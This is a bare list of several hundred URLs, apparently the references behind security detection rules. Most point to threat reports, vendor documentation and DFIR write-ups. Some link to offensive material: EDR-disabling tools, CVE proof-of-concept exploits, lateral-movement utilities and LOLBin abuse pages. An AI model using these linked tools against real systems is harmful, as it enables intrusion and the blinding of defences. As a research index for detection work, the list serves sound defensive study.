https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer - https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790 - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675 - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ - https://github.com/trufflesecurity/trufflehog - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ - https://www.linkedin.com/posts/huntress-labs_when-a-sketchy-incident-hits-your-network-activity-7304940371078238208-Th_l/?utm_source=share&utm_medium=member_desktop&rcm=ACoAAAJTlRcB28IaUtg03HUU-IdliwzoAL1flGc - https://github.com/TwoSevenOneT/EDR-Freeze - https://pentestlab.blog/2022/03/21/unconstrained-delegation/ - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ - https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/ - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-deviceguard - https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639 - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf - https://cardinalops.com/blog/the-art-of-anomaly-hunting-patterns-detection/ - https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15 - https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/ - 
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399 - https://redfoxsec.com/blog/ipv6-dns-takeover/ - https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771 - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2 - https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session - https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/ - https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/ - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet - https://www.cyberciti.biz/faq/linux-remove-user-command/ - https://x.com/cyberfeeddigest/status/1887041526397587859 - https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173 - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327 - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ - 
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776 - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ - https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/ - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3 - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ - https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c - https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1 - https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html - https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC - https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ - https://learn.microsoft.com/en-us/sql/t-sql/statements/truncate-table-transact-sql?view=sql-server-ver16 - https://twitter.com/Kostastsale/status/1480716528421011458 - https://www.fortiguard.com/psirt/FG-IR-22-398 - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - https://dfir.ch/posts/linux_capabilities/ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html - https://www.cyberciti.biz/faq/how-force-kill-process-linux/ - https://ss64.com/osx/sw_vers.html - https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection - 
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/ - https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions - https://blu.org/mhonarc/discuss/2001/04/msg00285.php - https://www.huntress.com/blog/attacking-mssql-servers-pt-ii - https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/ - https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware - https://docs.microsoft.com/en-us/sql/tools/bcp-utility - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html - https://lolbas-project.github.io/#/download - https://man7.org/linux/man-pages/man2/personality.2.html - https://research.checkpoint.com/2025/stealth-falcon-zero-day/ - https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension - https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ - https://www.softperfect.com/products/networkscanner/ - https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/ - https://github.com/amidaware/tacticalrmm - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/ - https://ngrok.com/blog-post/new-ngrok-domains - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis - https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation - https://github.com/mhaskar/FsquirtCPLPoC - https://learn.microsoft.com/en-us/windows/wsl/install - 
https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack - https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16 - https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/ - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin - https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix - https://naikordian.github.io/blog/posts/brute-force-aws-console/ - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/ - https://securelist.com/apt41-in-africa/116986/ - https://tria.ge/231023-lpw85she57/behavioral2 - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html - https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/ - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/ - https://github.com/0xthirteen/SharpMove/ - https://www.group-ib.com/blog/apt41-world-tour-2021/ - https://www.zscaler.fr/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla - https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/ - https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/ - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ - 
https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml - https://github.com/The-Viper-One/Invoke-PowerDPAPI/ - https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/ - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray - https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#exfiltration - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml - https://juggernaut-sec.com/capabilities/#cap_setgid - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef - https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ - https://pwn.guide/free/web/crushftp - https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1 - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps - 
https://www.huntress.com/blog/silencing-the-edr-silencers - https://vmois.dev/query-signal-desktop-messages-sqlite/ - https://tria.ge/231212-r1bpgaefar/behavioral2 - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/ - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625 - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10) - https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/ - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh - https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/ - https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html - https://feeds.alphasoc.net/bad-etlds.txt - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/ - https://ss64.com/nt/set.html - https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal - https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan - https://github.com/Arno0x/DNSExfiltrator/ - https://x.com/wietze/status/1958302556033065292?s=12 - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html - https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/ - https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/ - 
https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952 - https://man7.org/linux/man-pages/man2/sysinfo.2.html - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon - https://twitter.com/th3_protoCOL/status/1536788652889497600 - https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1 - https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/ - https://www.loobins.io/binaries/xattr/ - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker - https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference - https://github.com/grayhatkiller/SharpExShell - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/ - https://adsecurity.org/?p=3377 - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage - https://x.com/byrne_emmy12099/status/1932346420226658668 - https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes - https://moonlock.com/amos-backdoor-persistent-access - https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea - https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/ - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html - https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457 - 
https://blog.axelarator.net/hunting-for-edr-freeze/ - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 - https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060 - https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/ - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://www.coreycburton.com/blog/driploader-case-study - https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/ - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html - https://ss64.com/nt/schtasks.html - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md - https://cloud.google.com/logging/docs/audit/understanding-audit-logs - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure - https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/ - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md - 
https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php - https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211 - https://github.com/TwoSevenOneT/WSASS - https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/ - https://github.com/JohnHammond/recaptcha-phish - https://labs.nettitude.com/blog/introducing-sharpwsus/ - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ - https://redcanary.com/blog/threat-intelligence/msix-installers/ - https://gtfobins.github.io/gtfobins/gawk/#shell - https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/ - https://man7.org/linux/man-pages/man2/syslog.2.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ - https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/ - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html - https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/ - https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/ - https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/ - https://redcanary.com/blog/threat-detection/process-masquerading/ - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/ - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo - https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091 - https://github.com/msanft/CVE-2025-55182 - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution - 
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide - https://github.com/h4rmy/KDU - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear - https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493 - https://securelist.com/notepad-supply-chain-attack/118708/ - https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder - https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/ - https://asec.ahnlab.com/en/40263/ - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673 - https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/ - https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement - https://github.com/rtecCyberSec/BitlockMove - https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/ - https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/ - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/ - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870 - https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/ - 
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg - https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/ - https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking - https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/ - https://mrd0x.com/filefix-clickfix-alternative/ - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4 - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software - https://gtfobins.github.io/gtfobins/capsh/#shell - https://intel.thedfirreport.com/eventReports/view/70 - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ - https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/ - https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/ - https://x.com/Max_Mal_/status/1826179497084739829 - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/ - https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054 - https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad - https://www.scip.ch/en/?labs.20240523 - https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/ - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms - https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ - 
https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ - https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval - https://nodejs.org/api/child_process.html#class-childprocess - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/ - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053 - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws - https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html - https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/ - https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ - https://x.com/Threatlabz/status/1879956781360976155 - https://github.com/rapid7/metasploit-framework/issues/11337 - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks - https://tria.ge/240731-jh4crsycnb/behavioral2 - https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1 - https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468 - https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33 - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/ - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html - 
https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin - https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2 - https://itm4n.github.io/cdpsvc-dll-hijacking/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324 - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/ - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://megatools.megous.com/ - https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/ - https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/ - https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png - https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/ - https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt - https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel - https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 - https://trustedsec.com/blog/command-line-underdog-wmic-in-action - https://github.com/mulwareX/CVE-2025-6218-POC - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/ - https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/ - 
https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ - https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging - https://x.com/JangPr0/status/1932034543026065833 - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/ - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195 - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs - https://www.group-ib.com/resources/threat-research/red-curl-2.html - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/ - https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/ - https://github.com/rtecCyberSec/SpeechRuntimeMove - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address - https://x.com/0x534c/status/1944694507787710685 - https://www.loobins.io/binaries/nscurl/ - https://gtfobins.github.io/gtfobins/gcc/#shell - https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis - https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/ - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html - https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html - 
https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set - https://www.loobins.io/binaries/pbpaste/ - https://news.ycombinator.com/item?id=29504755 - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html - https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/ - https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8 - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://juggernaut-sec.com/capabilities/#cap_setuid - https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/ - https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://notepad-plus-plus.org/news/v889-released/ - https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50 - https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/ - https://cert.gov.ua/article/6284080 - https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/ - 